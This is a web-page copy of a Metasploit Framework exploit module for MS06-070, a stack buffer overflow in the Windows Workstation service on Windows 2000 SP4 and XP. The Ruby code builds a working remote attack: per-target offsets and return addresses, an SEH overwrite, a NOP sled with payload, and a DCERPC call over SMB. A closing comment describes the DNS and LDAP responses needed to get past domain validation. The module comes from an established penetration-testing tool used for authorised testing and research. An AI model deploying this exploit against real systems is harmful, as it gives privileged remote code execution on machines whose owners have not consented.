CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms06_070_wkssvc.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking # Requires valid/working DOMAIN + DC

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::SMB::Client

11
  include Msf::Exploit::Seh

12


13
  def initialize(info = {})

14
    super(update_info(info,

15
      'Name'           => 'MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow',

16
      'Description'    => %q{

17
          This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect

18
        function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.

19


20
        In order to exploit this vulnerability, you must specify the name of a

21
        valid Windows DOMAIN. It may be possible to satisfy this condition by using

22
        a custom DNS and LDAP setup, however that method is not covered here.

23


24
        Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator

25
        credentials are required to reach the vulnerable code. Windows XP SP1 only

26
        requires valid user credentials. Also, testing shows that a machine already

27
        joined to a domain is not exploitable.

28
      },

29
      'Author'         =>

30
        [

31
          'jduck'

32
        ],

33
      'License'        => MSF_LICENSE,

34
      'References'     =>

35
        [

36
          [ 'CVE', '2006-4691' ],

37
          [ 'OSVDB', '30263' ],

38
          [ 'BID', '20985' ],

39
          [ 'MSB', 'MS06-070' ],

40
        ],

41
      'DefaultOptions' =>

42
        {

43
          'EXITFUNC' => 'thread',

44
        },

45
      'Privileged'     => true,

46
      'Payload'        =>

47
        {

48
          'Space'    => 1024,

49
          'BadChars' => "\x00",

50
          'StackAdjustment' => -3500,

51
        },

52
      'Platform'       => 'win',

53
      'Targets'        =>

54
        [

55
          [ 'Automatic Targetting', { } ],

56
          [ 'Windows 2000 SP4',

57
            {

58
              'Offset' => (1058*2),

59
              'Ret' => 0x75022ac4  # pop/pop/ret in ws2help.dll

60
            }

61
          ],

62
          [ 'Windows XP SP0/SP1',

63
            {

64
              'Offset' => (1290*2),

65
              'Ret' => 0x71ab21cd   # pop/pop/ret in ws2_32.dll

66
            }

67
          ]

68
        ],

69
      'DefaultTarget'  => 0,

70
      'DisclosureDate' => '2006-11-14'))

71


72
    register_options(

73
      [

74
        OptString.new('SMBPIPE', [ true,  "The pipe name to use.", 'WKSSVC']),

75
        # NOTE: a valid domain name is required. See description.

76
        OptString.new('DOMAIN', [ true,  "The domain to validate prior to joining it."])

77
      ])

78


79
    deregister_options('SMB::ProtocolVersion')

80
  end

81


82
  def exploit

83


84
    connect(versions: [1])

85
    smb_login()

86


87
    mytarget = nil

88
    if (target.name =~ /Automatic/)

89
      case smb_peer_os()

90
        when 'Windows 5.0'

91
          print_status("Detected a Windows 2000 target")

92
          mytarget = targets[1]

93
        when 'Windows 5.1'

94
          begin

95
            smb_create("\\SRVSVC")

96
            print_status("Detected a Windows XP SP0/SP1 target")

97
          rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e

98
            if (e.error_code == 0xc0000022)

99
              fail_with(Failure::Unknown, "Windows XP SP2 requires Administrator privileges!")

100
            end

101
            print_status("Detected a Windows XP target (unknown patch level)")

102
          end

103
          mytarget = targets[2]

104
        else

105
          fail_with(Failure::NoTarget, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")

106
      end

107
    else

108
      mytarget = target

109
    end

110


111
    handle = dcerpc_handle(

112
      '6bffd098-a112-3610-9833-46c3f87e345a', '1.0',

113
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]

114
    )

115


116
    print_status("Binding to #{handle} ...")

117
    dcerpc_bind(handle)

118
    print_status("Bound to #{handle} ...")

119


120
    print_status("Building the stub data...")

121


122
    distance = mytarget['Offset']

123
    hostname = make_nops(distance - payload.encoded.length)

124
    hostname << payload.encoded

125
    hostname << generate_seh_record(mytarget.ret)

126
    hostname << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

127


128
    name = datastore['DOMAIN'] + "\\\\L"

129
    name = Rex::Text.to_unicode(name)

130
    name << hostname

131
    name << Rex::Text.to_unicode(rand_text_alphanumeric(1000) * 3)

132
    name << "\x00\x00"

133


134
    stub =

135
      NDR.uwstring("\\\\#{datastore['RHOST']}") +

136
      NDR.UnicodeConformantVaryingStringPreBuilt(name) +

137
      NDR.uwstring("") +

138
      NDR.uwstring("") +

139
      NDR.long(0) +

140
      NDR.long(1)

141


142
    print_status("Calling the vulnerable function...")

143


144
    begin

145
      dcerpc.call(0x16, stub)

146
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse

147
    rescue => e

148
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/

149
        raise e

150
      end

151
    end

152


153
    # Cleanup

154
    handler

155
    disconnect

156
  end

157
end

158


159


160


161
=begin

162


163
The IDL for NetrJoinDomain2 looks like this:

164
long _NetrJoinDomain2@28 (

165
  [in][unique][string] wchar_t * arg_1,

166
  [in][string] wchar_t * arg_2,

167
  [in][unique][string] wchar_t * arg_3,

168
  [in][unique][string] wchar_t * arg_4,

169
  [in][unique] struct_C * arg_5,

170
  [in] long arg_6

171
  );

172


173


174
1. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN

175
2. <-- dns server - response including answer and additional record.

176
                    answer: whateverserver.DOMAIN priority 0 / weight 100 / port 389

177
              additional: IN.A address of whateverserver.DOMAIN

178
3. --> ldap server - baseObject query with filter/attributes:

179
                   - filter: (&(&(DnsDomain=DOMAIN)(Host=TARGETHOSTNAME))(NtVer=06:00:00:00))

180
             - attributes: AttributeDescriptionList: NetLogon

181
4. <-- ldap server - searchResDone success, attributes data

182
                   - PartialAttributeList netlogon - 1 item

183
               - type 23, flags 0x1fd, domain GUID,

184
              forest, domain, hostname, netbios domain, netbios hostname,

185
              user, site, client site, version, lmtoken, nttoken

186
5. validated.

187


188
=end

189


190